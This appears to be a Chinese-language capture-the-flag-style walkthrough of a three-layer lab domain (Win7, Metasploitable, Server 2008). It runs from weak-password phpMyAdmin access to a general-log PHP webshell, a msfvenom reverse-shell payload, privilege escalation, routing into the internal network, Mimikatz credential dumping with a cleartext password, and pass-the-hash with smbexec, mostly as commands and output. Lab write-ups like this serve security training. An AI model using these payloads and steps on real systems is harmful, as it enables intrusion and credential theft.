Kali
192.168.35.128
===============================================================================
第一层靶机 Win7
192.168.35.153
192.168.52.143
===============================================================================
第二层靶机 Metaploitable
192.168.52.141
===============================================================================
第三层靶机 WinServer2008
192.168.52.138
第一层主机
存活主机扫描
- nmap -sP 192.168.35.0/24
└─# nmap -sP 192.168.35.0/24
===================================================
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-03 21:43 EST
Nmap scan report for 192.168.35.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.35.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:F5:B1 (VMware)
Nmap scan report for 192.168.35.153 =====> 疑似存活主机
Host is up (0.00019s latency).
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Nmap scan report for 192.168.35.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:EC:7B:6C (VMware)
Nmap scan report for 192.168.35.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.98 seconds
192.168.35.135 ===> 疑似存活主机IP地址
端口扫描
- nmap -PS 192.168.35.153
└─# nmap -PS 192.168.35.153
==============================================================================
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-03 21:45 EST
Nmap scan report for 192.168.35.153
Host is up (0.00034s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds
信息收集
访问 192.168.35.143:80
网站首页名字:phpStudy探针2014
绝对路径:C:/phpStudy/WWW
探针路径:C:/phpStudy/WWW/l.php
Php版本:5.4.45
目录扫描
[22:11:24] 200 - 71KB - /phpinfo.php
[22:11:24] 301 - 241B - /phpMyAdmin -> http://192.168.35.153/phpMyAdmin/
[22:11:24] 301 - 241B - /phpmyadmin -> http://192.168.35.153/phpmyadmin/
[22:11:25] 200 - 2KB - /phpmyadmin/README
[22:11:25] 200 - 32KB - /phpmyadmin/ChangeLog
[22:11:25] 200 - 4KB - /phpmyadmin/index.php
[22:11:25] 200 - 4KB - /phpMyAdmin/index.php
[22:11:25] 200 - 4KB - /phpmyAdmin/
[22:11:25] 200 - 4KB - /phpmyadmin/
[22:11:25] 200 - 4KB - /phpMyAdmin/
[22:11:25] 200 - 4KB - /phpMyadmin/
Phpmyadmin
测试弱密码
- 账号:root
- 密码:root
网上搜索phpmyadmin历史漏洞
其复现步骤如下
general log:off ===> general log:on
general log file ===> C:/phpStudy/WWW/1.php
payload: SELECT '<?php @eval($_REQUEST[6]);?>'
==> 注意这里使用'' 因为使用双引号会报错
获取shell
蚁剑测试连接
提权
方法一:MsfVenom
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.128 LPORT=9527 -f exe > shell.exe
上传木马文件到目标主机,然后kali使用multi/handler模块进行监听,然后在蚁剑运行上传的木马文件,即可获取权限,这一次直接提权即可
meterpreter > getuid
Server username: GOD\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
方法二:CS
利用kali、win10开启CS
CS生成木马文件,将木马文件上传到目标服务器,运行,然后直接进行提权
第二层主机
信息收集
因为第一层主机权限已经拿下,我们便以此为跳板对内网进行扫描
首先ipconfig看一下IP地址
发现了有2个ip地址
192.168.35.153
192.168.52.143
====> 并发现有域的存在
域名 主 DNS 后缀 . . . . . . . . . . . : god.org
kali 挂代理扫描内网
说明192.168.52.0/24网段是内网的网段,我们需要挂代理进行内网渗透
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.52.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[+] Added route to 192.168.52.0/255.255.255.0 via 192.168.35.153
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.52.0 255.255.255.0 Session 1
没有192.168.52.0/24网段 则表示我们无法访问到内网的网址,所以我们需要添加路由进行设置
运行 proxychains4 nmap -sP 192.168.52.0/24
结果:全部C段网站都存活 ===> 挂代理用kali扫不动,于是便换成CS进行C段扫描
CS扫描内网存活主机
将nbtscan上传至目标服务器,然后运行
发现存活主机
-
192.168.52.138
-
192.168.52.141
-
192.168.52.143 ==>本机IP
端口扫描
beacon> portscan 192.168.52.0-192.168.52.255 23,3389,445 arp 1024
[*] Tasked beacon to scan ports 23,3389,445 on 192.168.52.0-192.168.52.255
[+] host called home, sent: 93285 bytes
[+] received output:
(ARP) Target '192.168.52.1' is alive. 00-50-56-C0-00-01
[+] received output:
(ARP) Target '192.168.52.143' is alive. 00-0C-29-A7-C1-A8
(ARP) Target '192.168.52.138' is alive. 00-0C-29-3F-5D-A9
(ARP) Target '192.168.52.141' is alive. 00-0C-29-6D-39-34
[+] received output:
(ARP) Target '192.168.52.254' is alive. 00-50-56-F3-FB-8A
[+] received output:
192.168.52.1:445
192.168.52.138:445 (platform: 500 version: 6.1 name: OWA domain: GOD)
192.168.52.141:445 (platform: 500 version: 5.2 name: ROOT-TVI862UBEH domain: GOD)
192.168.52.143:445 (platform: 500 version: 6.1 name: STU1 domain: GOD)
Scanner module is complete
总结:445端口都处于开启的状态,这时候我们可以使用PTH
横向移动
先利用我们获取到的权限将目标主机的hash拿到
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
7f274332b7a2e4623bb7d86fb340c8f3
结合之前端口扫描,我们使用exploit/windows/smb/psexec模块,然后进行横向渗透
结果都寄!!!
然后我们使用了impacket
这个工具进行横向渗透,点击Run Mimikatz
Authentication Id : 0 ; 1906011 (00000000:001d155b)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2024/3/4 17:02:13
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : 6139ff1072a8d0fe1e929ffc01395127
* NTLM : 7f274332b7a2e4623bb7d86fb340c8f3 ========> 此处对应的hash值不同于上述的hash值,去查询后发现这里的hash值正是对应的密码Aa@123456
* SHA1 : fbf44607ca7c0e989adee2673478f81266a4d3fe
tspkg :
* Username : Administrator
* Domain : GOD
* Password : Aa@123456
wdigest :
* Username : Administrator
* Domain : GOD
* Password : Aa@123456
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : Aa@123456
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID : S-1-5-20
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 8e13aa48490fd42d88155fdc788ac265
* SHA1 : 41a638b7124b34680806801699a0310d1cdeb483
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
ssp :
credman :
Authentication Id : 0 ; 52183 (00000000:0000cbd7)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID :
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 8e13aa48490fd42d88155fdc788ac265
* SHA1 : 41a638b7124b34680806801699a0310d1cdeb483
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2024/3/4 17:01:40
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d
ssp :
credman :
- python3 smbexec.py -hashes :7f274332b7a2e4623bb7d86fb340c8f3 GOD/Administrator@192.168.52.141
- python3 smbexec.py -hashes :7f274332b7a2e4623bb7d86fb340c8f3 GOD/Administrator@192.168.52.138
输入上述命令即可横向移动
拿到后续2台服务器的权限